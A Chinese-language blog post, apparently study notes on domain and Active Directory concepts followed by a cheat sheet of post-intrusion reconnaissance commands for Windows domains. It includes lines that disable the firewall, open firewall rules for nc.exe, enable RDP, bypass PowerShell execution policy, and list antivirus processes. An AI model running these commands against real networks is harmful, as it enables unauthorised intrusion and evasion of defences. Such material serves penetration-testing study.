<h3 id="域信任"><a href="#域信任" class="headerlink" title="域信任"></a>域信任</h3><figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">域信任关系是指在计算机网络中，不同域之间建立的相互信任和合作的关系。一个域可以是一个网络或者一个组织，而域信任关系则是指不同域之间的信任程度和允许的访问权限。</span><br><span class="line"></span><br><span class="line">在计算机网络中，域信任关系的建立通常是通过身份验证和授权机制来实现的。以下是一些常见的域信任关系的示例：</span><br><span class="line"></span><br><span class="line">单向信任关系（One-Way Trust）：在这种关系中，一个域被信任并允许访问另一个域的资源，但被信任的域不信任或不允许访问信任它的域的资源。这种关系通常用于实现一种上下级关系，例如一个子域信任其父域，但父域不信任子域。</span><br><span class="line"></span><br><span class="line">双向信任关系（Two-Way Trust）：在这种关系中，两个域之间互相信任并允许访问对方的资源。这种关系通常用于实现不同组织之间的合作和共享资源。</span><br><span class="line"></span><br><span class="line">传递信任关系（Transitive Trust）：在这种关系中，如果域A信任域B，域B信任域C，那么域A也会信任域C。这种关系允许信任关系在域之间传递，从而实现更复杂的信任网络。</span><br><span class="line"></span><br><span class="line">域信任关系的建立需要通过身份验证来验证用户的身份，并通过授权来确定用户在其他域中的权限。常见的身份验证方法包括用户名和密码、数字证书、双因素认证等。授权机制则定义了用户在其他域中能够执行的操作和访问的资源范围。</span><br><span class="line"></span><br><span class="line">域信任关系对于构建安全且高效的网络环境至关重要。它可以实现跨域资源的共享和协作，提高系统的可用性和灵活性。然而，建立域信任关系也需要谨慎处理，确保安全性和隐私性的同时，防止未经授权的访问和滥用。</span><br></pre></td></tr></table></figure>



<h2 id="4-活动目录"><a href="#4-活动目录" class="headerlink" title="4.活动目录:"></a>4.活动目录:</h2><p><strong>活动目录（Active Directory，AD）是域环境中提供目录服务的组件。</strong> 目录用于存储有关网络对象（如用户、组、计算机、共享资源、打印机和联系人等）的信息。目录服务是帮助用户快速准确的从目录中查找到他所需要的信息的服务。其中将层次结构的目录及索引信息存储在数据库中，就是活动目录数据库（AD库）。</p>
<p>管理层次分明：<strong>A集团（域森林） -&gt; 子公司（域树） -&gt; 部门（域） -&gt; 员工</strong></p>
<p><strong>AD相当于树干。</strong></p>
<h3 id="活动目录有什么功能"><a href="#活动目录有什么功能" class="headerlink" title="活动目录有什么功能?"></a>活动目录有什么功能?</h3><ol>
<li>帐号集中管理：所有帐号均存储在服务器中，以便执行命令和重置密码等。</li>
<li>软件集中管理：统一推送软件，统一安装网络打印机等。利用软件发布策略分发软件，可以让用户自由选择安装软件。</li>
<li>环境集中管理：利用AD可以统一客户端桌面，IE，TCP&#x2F;IP等设置。</li>
<li>增强安全性：统一部署杀毒软件和病毒扫描任务、集中化管理用户的计算机权限、统一制订用户密码策略等。可以监控网络，对资料进行统一管理。</li>
<li>更可靠，更少的宕机时间：例如：利用AD控制用户访问权限，利用群集、负载均衡等技术对文件服务器进行容灾设定。网络更可靠，岩机时间更少。</li>
</ol>
<h2 id="5-DC和AD区别？"><a href="#5-DC和AD区别？" class="headerlink" title="5.DC和AD区别？"></a>5.DC和AD区别？</h2><p>如果内网中的一台计算机上安装了AD，它就变成了DC（用于存储AD库的计算机）。</p>
<p><strong>DC的本质是一台计算机，AD的本质是提供目录服务的组件。</strong></p>
<h2 id="6-安全域的划分"><a href="#6-安全域的划分" class="headerlink" title="6.安全域的划分:"></a>6.安全域的划分:</h2><p>安全域划分的目的是将一组安全等级相同的计算机划入同一个网段内， 在网络边界上通过防火墙来实现对其他安全域的NACL（网络访问控制策略）， 使得其风险最小化。</p>
<p><strong>一般安全域划分为：DMZ和内网。</strong></p>
<p><strong>DMZ（Demilitarized Zone 非军事化区）称为隔离区。 为了解决安装防火墙后外部网络不能访问内部网络服务器的问题，而设立的一个非安全系统与安全系统之间的缓冲区。</strong></p>
<p>DMZ不能访问内网，DMZ不能访问外网（此策略有例外，如mail服务）。</p>
<p><strong>内网又可以划分为：办公区和核心区。</strong></p>
<p>办公区会安装防病毒软件、主机入侵检测产品（HIDS）等，运维使用堡垒机（跳板机）来统一管理用户的登陆行为。</p>
<h2 id="7-域内计算机分类"><a href="#7-域内计算机分类" class="headerlink" title="7.域内计算机分类:"></a>7.域内计算机分类:</h2><p>域控制器、成员服务器、客户机和独立服务器。</p>
<h2 id="8-域内权限"><a href="#8-域内权限" class="headerlink" title="8.域内权限:"></a>8.域内权限:</h2><p><strong>域内置组分为：域本地组（Domain Local Group）、全局组（Global Group）、通用组（Universal Group）。</strong>管理员通过配置安全组访问权限，就可以为所有加入安全组的用户账号配置同样的权限。</p>
<p><strong>全局组相当于域账号，可以在全局使用，域本地组相当于本地账号，只能本机上使用。</strong></p>
<p>e.g. 将用户张三（域帐号Z3）加入到域本地组administrators中，并不能使Z3对非DC的域成员计算机有任何特权，但若加入到全局组Domain Admins中，张三就是域管理员了，可以在全局使用，对域成员计算机是有特权的。</p>
<p>A-G-DL-P策略， A（Account）、G、 DL、 P（Permission），<strong>是指将用户账号添加到全局组中，将全局组添加到域本地组中，然后为域本地组分配资源权限。</strong> 在A-G-DL-P策略形成以后，当给一个用户某一个权限的时候，只要把这个用户加入到某一个域本地组就可以了。</p>
<p>e.g. 有两个域，A和B，A中的5个财务人员和B中的3个财务人员都需要访问B中的“FINA”文件夹。这时，可以在B中建一个DL(域本地组)，因为DL的成员可以来自所有的域，然后把这8个人都加入这个DL，并把FINA的访问权赋给DL。这样做的坏处是什么呢？因为DL是在B域中，所以管理权也在B域，如果A域中的5 个人变成6个人，那只能A域管理员通知B域管理员，将DL的成员做一下修改，B域的管理员太累了。这时候，我们改变一下，在A和B域中都各建立一个全局组（G），然后在B域中建立一个DL，把这两个G都加入B域中的DL中，然后把FINA的访问权赋给 DL。哈哈，这下两个G组都有权访问FINA文件夹了，是吗？组嵌套造成权限继承嘛！这时候，两个G分布在A和B域中，也就是A和B的管理员都可以自己管理自己的G啦，只要把那5个人和3个人加入G中，就可以了！以后有任何修改，都可以自己做了，不用麻烦B域的管理员！这就是A-G-DL-P。</p>
<p><strong>域本地组来自全林，作用于本域；全局组来自本域，作用于全林；通用组来自全林，作用于全林。</strong></p>
<p>常用DL： Administrators（管理员组），最重要的权限； Remote Desktop Users（远程登录组）。</p>
<p>常用G： Domain Admins（域管理员组），最最重要的权限，一般来说域渗透是看重这个； Domain Users（域用户组）。</p>
<p>常见U： Enterprise Admins（企业系统管理员组）、 Schema Admins（架构管理员组），也是最最重要的权限。</p>
<h2 id="9-组织单元ou"><a href="#9-组织单元ou" class="headerlink" title="9.组织单元ou:"></a>9.组织单元ou:</h2><p>组织单元是可以将用户、组、计算机和其它组织单位放入其中的AD(Active Directory，活动目录)容器，是可以指派组策略设置或委派管理权限的最小作用域或单元。性质是最小作用域或单元</p>
<p>可以抽象为文件夹</p>
<h2 id="10-内网协议"><a href="#10-内网协议" class="headerlink" title="10.内网协议"></a>10.内网协议</h2><ul>
<li><p><a href="https://zhuanlan.zhihu.com/p/79196603" target="_blank" rel="noopener">NTLM协议</a></p>
</li>
<li><p><a href="https://zhuanlan.zhihu.com/p/266491528" target="_blank" rel="noopener">Kerberos协议</a></p>
</li>
<li><p><a href="https://zhuanlan.zhihu.com/p/147768058" target="_blank" rel="noopener">Ldap协议</a></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ldap目录类似于文件系统目录,如CN=DC01,OU=Domain Controllers,DC=xie,DC=com</span><br><span class="line">可以看作xie.com/Domain Controllers/DC01</span><br></pre></td></tr></table></figure></li>
</ul>
<hr>
</font>

<font size=4 >

<!-- more -->



<p>搭建内网环境:<a href="https://www.bilibili.com/video/BV1H34y1B7JG" target="_blank" rel="noopener">https://www.bilibili.com/video/BV1H34y1B7JG</a></p>
<h1 id="1-内网信息搜集"><a href="#1-内网信息搜集" class="headerlink" title="1.内网信息搜集:"></a>1.内网信息搜集:</h1><p>《内网安全攻防：渗透测试实战指南》第2章：内网信息搜集</p>
<p>内网渗透测试的核心是信息搜集。本章主要介绍了当前主机信息搜集、域内存活主机探测、域内端口扫描、域内用户和管理员权限的获取、如何获取域内网段划分信息和拓扑架构分析等，并介绍了域分析工具 <a href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a>的<a href="https://xz.aliyun.com/t/7311#toc-0" target="_blank" rel="noopener">使用</a>。</p>
<p><strong>在进入内网后，首先判断三个问题:</strong><br>1.<strong>我是谁</strong>    -   对当前机器角色的判断<br>2.<strong>这是哪</strong>    -   对当前机器所处网络环境的拓扑结构进行分析和判断<br>3.<strong>我在哪</strong>    -   对当前机器所处区域的判断</p>
<h2 id="一、收集本机信息"><a href="#一、收集本机信息" class="headerlink" title="一、收集本机信息"></a>一、收集本机信息</h2><h3 id="1-查询网络配置命令："><a href="#1-查询网络配置命令：" class="headerlink" title="1.查询网络配置命令："></a>1.查询网络配置命令：</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br></pre></td></tr></table></figure>

<h3 id="2-查询操作系统及软件的信息"><a href="#2-查询操作系统及软件的信息" class="headerlink" title="2.查询操作系统及软件的信息"></a>2.查询操作系统及软件的信息</h3><p>1）查看操作系统和版本信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">systeminfo | findstr /B /C:&quot;OS Name&quot; /C:&quot;OS Version&quot;</span><br><span class="line">//适用于英文的操作系统，中文的：</span><br><span class="line">systeminfo | findstr /B /C:&quot;OS 名称&quot; /C:&quot;OS 版本&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQ3M8.png" alt="avatar"></p>
<p>2）查看系统体系结构</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo %PROCESSOR_ARCHITECTURE%</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQ8sS.png" alt="avatar"></p>
<ol start="3">
<li>查看安装的软件及版本、路径等</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic product get name,version</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQ0zV.png" alt="avatar"></p>
<p>Powershell版本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe &quot;Get-WmiObject -class Win32_Product | Select-Object -Property name,Version&quot;</span><br></pre></td></tr></table></figure>

<h3 id="3-查询本机服务信息"><a href="#3-查询本机服务信息" class="headerlink" title="3.查询本机服务信息"></a>3.查询本机服务信息</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service list brief</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQGqg.png" alt="avatar"></p>
<h3 id="4-查询进程列表"><a href="#4-查询进程列表" class="headerlink" title="4.查询进程列表"></a>4.查询进程列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tasklist</span><br><span class="line">//或者</span><br><span class="line">wmic process list brief</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQNIs.png" alt="avatar"></p>
<h4 id="常见杀毒软件进程"><a href="#常见杀毒软件进程" class="headerlink" title="常见杀毒软件进程"></a>常见杀毒软件进程</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">360sd.exe</span><br><span class="line">360tray.exe</span><br><span class="line">ZhuDongFangYu.exe</span><br><span class="line">KSafeTray.exe</span><br><span class="line">SafeDogUpdateCenter.exe</span><br><span class="line">McAfee McShield.exe</span><br><span class="line">egui.exe //NOD32</span><br><span class="line">AVP.EXE  //卡巴斯基</span><br><span class="line">avguard.exe		//小红伞</span><br><span class="line">bdagent.exe		//BitDefender</span><br></pre></td></tr></table></figure>

<h3 id="5-查看启动程序信息"><a href="#5-查看启动程序信息" class="headerlink" title="5.查看启动程序信息"></a>5.查看启动程序信息</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic startup get command,caption</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQain.png" alt="avatar"></p>
<h3 id="6-查看计划任务"><a href="#6-查看计划任务" class="headerlink" title="6.查看计划任务"></a>6.查看计划任务</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /query /fo LIST /v</span><br></pre></td></tr></table></figure>

<h3 id="7-查看主机开机时间"><a href="#7-查看主机开机时间" class="headerlink" title="7.查看主机开机时间"></a>7.查看主机开机时间</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net statistics workstation</span><br></pre></td></tr></table></figure>

<h3 id="8-查询用户列表"><a href="#8-查询用户列表" class="headerlink" title="8.查询用户列表"></a>8.查询用户列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">net user</span><br><span class="line">//获取本地管理员组成员：</span><br><span class="line">net localgroup adinistrators</span><br><span class="line">//查看当前再线用户</span><br><span class="line">query user || qwinsta</span><br></pre></td></tr></table></figure>

<h3 id="9-列出或断开本地计算机与所连接的客户端之间的会话"><a href="#9-列出或断开本地计算机与所连接的客户端之间的会话" class="headerlink" title="9.列出或断开本地计算机与所连接的客户端之间的会话"></a>9.列出或断开本地计算机与所连接的客户端之间的会话</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net session</span><br></pre></td></tr></table></figure>

<h3 id="10-查询端口列表"><a href="#10-查询端口列表" class="headerlink" title="10.查询端口列表"></a>10.查询端口列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano</span><br></pre></td></tr></table></figure>

<h3 id="11-查询补丁列表"><a href="#11-查询补丁列表" class="headerlink" title="11.查询补丁列表"></a>11.查询补丁列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systeminfo</span><br></pre></td></tr></table></figure>

<h3 id="12-查询本机共享列表"><a href="#12-查询本机共享列表" class="headerlink" title="12.查询本机共享列表"></a>12.查询本机共享列表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">net share</span><br><span class="line">//wmic:</span><br><span class="line">wmic share get name,path,status</span><br></pre></td></tr></table></figure>

<h3 id="13-查询路由表及所有可用接口的ARP缓存表"><a href="#13-查询路由表及所有可用接口的ARP缓存表" class="headerlink" title="13.查询路由表及所有可用接口的ARP缓存表"></a>13.查询路由表及所有可用接口的ARP缓存表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">route print</span><br><span class="line">arp -a</span><br></pre></td></tr></table></figure>

<h3 id="14-查询防火墙相关配置"><a href="#14-查询防火墙相关配置" class="headerlink" title="14.查询防火墙相关配置"></a>14.查询防火墙相关配置</h3><p>1）关闭防火墙</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//windows server 2003之前</span><br><span class="line">netsh firewall set opmode disable</span><br><span class="line">//Windows server 2003之后</span><br><span class="line">netsh advfirewall set allprofile state off</span><br></pre></td></tr></table></figure>

<p>2）查看防火墙配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh firewall show config</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>修改防火墙配置</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//windows server 2003之前允许指定程序全部连接</span><br><span class="line">netsh firewall add allowedprogram c:\nc.exe &quot;allow nc&quot; enable</span><br><span class="line">//windows server 2003之后的版本</span><br><span class="line">netsh advfirewall firewall add rule name=&quot;pass nc&quot; dir=in action=allow program=&quot;c:\nc.exe&quot;</span><br><span class="line">//允许指定程序退出</span><br><span class="line">netsh advfirewall firewall add rule name=&quot;Allow nc&quot; dir=out action=allow program=&quot;C:\nc.exe&quot;</span><br><span class="line">//允许3389端口放行</span><br><span class="line">netsh advfirewall firewall add rule name=&quot;Remote Desktop&quot; protocol=TCP dir=in localport=3389 action=allow</span><br></pre></td></tr></table></figure>

<p>4)自定义防火墙日志的存储位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netsh advfirewall set currentprofile logging filename &quot;C:\windows\temp\fw.log&quot;</span><br></pre></td></tr></table></figure>

<h3 id="15-查看代理配置情况"><a href="#15-查看代理配置情况" class="headerlink" title="15.查看代理配置情况"></a>15.查看代理配置情况</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&quot;</span><br></pre></td></tr></table></figure>

<h3 id="16-查询并开启远程连接服务"><a href="#16-查询并开启远程连接服务" class="headerlink" title="16.查询并开启远程连接服务"></a>16.查询并开启远程连接服务</h3><p>1）查看远程连接端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg query &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /V PortNumber</span><br></pre></td></tr></table></figure>

<p>2)在Windows server 2003中开启3389</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic path win32_terminalservicesetting where (__CLASS !=&quot;&quot;) call setallowtsconnections 1</span><br></pre></td></tr></table></figure>

<p>3)在Windows server 2008和2012中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=&quot;&quot;) call setallowtsconnections 1</span><br><span class="line">//修改注册表方式</span><br><span class="line">reg query &quot;HKLM\System\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER&quot; /v fSingleSessionPerUser /t REG_DWORD /d 0 /f</span><br></pre></td></tr></table></figure>

<h3 id="17-自动收集信息"><a href="#17-自动收集信息" class="headerlink" title="17. 自动收集信息"></a>17. 自动收集信息</h3><p>这里原文将上述的语句进行自动化，并将结果输出到了一个HTML文件中。</p>
<h3 id="18-Empire下的主机信息收集"><a href="#18-Empire下的主机信息收集" class="headerlink" title="18.Empire下的主机信息收集"></a>18.Empire下的主机信息收集</h3><p>使用模块：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">usemodule situational_awareness/host/winenum</span><br><span class="line">execute</span><br></pre></td></tr></table></figure>

<h3 id="19-查询当前权限"><a href="#19-查询当前权限" class="headerlink" title="19. 查询当前权限"></a>19. 查询当前权限</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whoami /all</span><br></pre></td></tr></table></figure>

<p>查询指定用户的详细信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user xxx /domain</span><br></pre></td></tr></table></figure>

<h2 id="二、收集域内信息"><a href="#二、收集域内信息" class="headerlink" title="二、收集域内信息"></a>二、收集域内信息</h2><h3 id="1-判断是否存在域"><a href="#1-判断是否存在域" class="headerlink" title="1.判断是否存在域"></a>1.判断是否存在域</h3><p>查看dns服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br><span class="line">//将查看到的DNS服务器用nslookup进行解析</span><br><span class="line">nslookup dc.test.local</span><br><span class="line"></span><br><span class="line">net config workstation</span><br></pre></td></tr></table></figure>

<p>查看系统详细信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systeminfo | findstr /B /C:&quot;登录服务器&quot;</span><br><span class="line">//如果结果不为&quot;WORKGROUP&quot;则主机为域主机</span><br></pre></td></tr></table></figure>

<p>查询当前登录域及登录用户信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net group workstation</span><br></pre></td></tr></table></figure>

<p>判断主域</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net time /domain</span><br><span class="line">//命令用于查看域内时间，同时也可以查看域控制器</span><br></pre></td></tr></table></figure>

<h3 id="2-探测域内存活主机"><a href="#2-探测域内存活主机" class="headerlink" title="2. 探测域内存活主机"></a>2. 探测域内存活主机</h3><p>使用nbtscan(<a href="http://www.unixwiz.net/tools/nbtscan.html" target="_blank" rel="noopener">http://www.unixwiz.net/tools/nbtscan.html</a>)<br>探测当前网段主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nbt.exe 192.168.1.0/20</span><br></pre></td></tr></table></figure>

<p>使用ICMP探测</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr &quot;TTL=&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQdGq.png" alt="avatar"></p>
<p>通过ARPscan工具扫描探测内网</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp.exe -t 192.168.1.0/20</span><br></pre></td></tr></table></figure>

<p>Empire中的ARPscan模块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">usemode situational_awareness/network/arpscan</span><br><span class="line">execute</span><br></pre></td></tr></table></figure>

<p>Nishang中的Invoke-ARPScan.ps1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -exec bypass -Command &quot;&amp; (Import-module c:\windows\temp\Invoke-ARPscan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/20)&quot; &gt;&gt; c:\windows\temp\log.txt</span><br><span class="line">type c:\windows\temp\log.txt</span><br></pre></td></tr></table></figure>

<p>通过常规的TCP&#x2F;UDP端口扫描探测内网</p>
<p>上传ScanLine进行扫描：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scanline -h -t 22,80-90,110,445 -u 53,161 -O c:\windows\temp\log.txt -p 192.168.1.1-254 /b</span><br></pre></td></tr></table></figure>

<h3 id="3-扫描域内端口"><a href="#3-扫描域内端口" class="headerlink" title="3.扫描域内端口"></a>3.扫描域内端口</h3><p>telnet(但是这个速度太慢了点)</p>
<p>S扫描器</p>
<p>Metasploit端口扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">auxiliary/scanner/portscan/tcp</span><br><span class="line">set ports 1-1000</span><br><span class="line">set RHOST 192.168.1.1</span><br><span class="line">set THREADS 10</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>PowerSploit、NiShang的Invoke-portscan脚本</p>
<h3 id="4-收集域内基础信息"><a href="#4-收集域内基础信息" class="headerlink" title="4. 收集域内基础信息"></a>4. 收集域内基础信息</h3><p>(管理员运行 cmd&#x2F;powershell)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">net view /domain</span><br><span class="line">//查询域</span><br><span class="line"></span><br><span class="line">net view /domain:tonydog.lab</span><br><span class="line">//查询域内所有计算机</span><br><span class="line"></span><br><span class="line">net group /domain</span><br><span class="line">//查询域内所有用户组列表</span><br><span class="line"></span><br><span class="line">net group &quot;domain computers&quot; /domain</span><br><span class="line">//查询所有域成员计算机列表</span><br><span class="line"></span><br><span class="line">net accounts /domain</span><br><span class="line">//获取域内密码信息</span><br><span class="line"></span><br><span class="line">nltest /domain_trusts</span><br><span class="line">//域内信任信息</span><br></pre></td></tr></table></figure>

<p><a href="https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml" target="_blank" rel="noopener">活动目录查询工具 AdFind</a></p>
<h3 id="5-查找域控"><a href="#5-查找域控" class="headerlink" title="5. 查找域控"></a>5. 查找域控</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">nltest /DCLIST:test</span><br><span class="line"></span><br><span class="line">net time /domain</span><br><span class="line"></span><br><span class="line">Nslookup -type=SRV _ldap._tcp</span><br><span class="line"></span><br><span class="line">net group &quot;Domain Controllers&quot; /domain</span><br><span class="line"></span><br><span class="line">netdom query pdc</span><br><span class="line">//查看主控制器</span><br></pre></td></tr></table></figure>

<h3 id="6-获取域内的用户和管理员信息"><a href="#6-获取域内的用户和管理员信息" class="headerlink" title="6. 获取域内的用户和管理员信息"></a>6. 获取域内的用户和管理员信息</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">//查询所有域用户列表</span><br><span class="line">net user /domain</span><br><span class="line"></span><br><span class="line">//获取域内用户的详细信息</span><br><span class="line">wmic useraccount get /all</span><br><span class="line"></span><br><span class="line">//查看存在的用户,但是这个只能在域控或者安装了对应服务的主机使用，否则会提示命令不存在</span><br><span class="line">dsquery user</span><br><span class="line"></span><br><span class="line">//查找目录中的计算机</span><br><span class="line">dsquery computer</span><br><span class="line"></span><br><span class="line">//查询本地管理员组用户</span><br><span class="line">net localgroup administrators</span><br><span class="line"></span><br><span class="line">//查询域管理员用户组</span><br><span class="line">net group &quot;domain admins&quot; /domain</span><br><span class="line"></span><br><span class="line">//查询管理员用户组</span><br><span class="line">net group &quot;Enterprise Admins&quot; /domain</span><br></pre></td></tr></table></figure>

<h3 id="7-定位域管理员"><a href="#7-定位域管理员" class="headerlink" title="7. 定位域管理员"></a>7. 定位域管理员</h3><p>在获取了Windows域中的普通权限在进行横向渗透时，需要知道域内用户登录的位置，是否是任何系统&#x2F;主机的本地管理员，以及所属组等信息。能够使用的工具有：psloggedon.exe、PVEFindADUser.exe、netness.exe、hunter、NetView、PowerView。</p>
<p><strong>psloggedon.exe</strong></p>
<p>能够通过此工具查看远程计算机的资源，也就是说能够查看目标主机有哪些账户在登录状态</p>
